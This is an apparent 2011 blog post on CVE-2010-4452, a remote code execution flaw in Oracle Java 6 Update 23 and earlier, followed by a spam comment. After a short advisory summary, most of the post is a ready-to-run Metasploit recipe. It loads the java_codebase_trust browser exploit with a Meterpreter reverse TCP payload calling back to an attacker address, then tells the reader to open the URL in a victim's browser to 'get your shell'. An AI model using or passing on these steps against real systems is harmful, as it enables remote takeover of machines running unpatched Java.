Saturday, 30 April 2011

JAVA CVE-2010-4452




CVE:  CVE-2010-4452
Remote:  Yes
Local:  No
Published:  Feb 15 2011 12:00AM
Updated:  Apr 19 2011 08:45PM
Description: Oracle Java is prone to a remote code-execution vulnerability in Java Runtime Environment.An attacker can exploit this issue to execute arbitrary code with SYSTEM-level privileges.This vulnerability affects the following supported versions:6 Update 23 and lower.
To exploit you can use the folloing systax on metasploit:
use windows/browser/java_codebase_trust
set SRVHOST 192.168.1.69
set SRVPORT 80
set URIPATH /
set PAYLOAD java/meterpreter/reverse_tcp
set LHOST 192.168.1.69
set LPORT 8888
exploit
Then open up the client browser and open the URL  http://192.168.1.69/
You should get your shell!
I tested on windows XP and Windows 7, both worked fine, but it didn't worked on ubuntu.

1 comment:

  1. hi...
    i am Gaurav Garg From How To Hack A Computer
    i like your web site or all available content but i like this post the most..
    thanks for providing this information in this open way..

    Regards
    Gaurav garg

    Keep Posting
    Have A Nice day

    ReplyDelete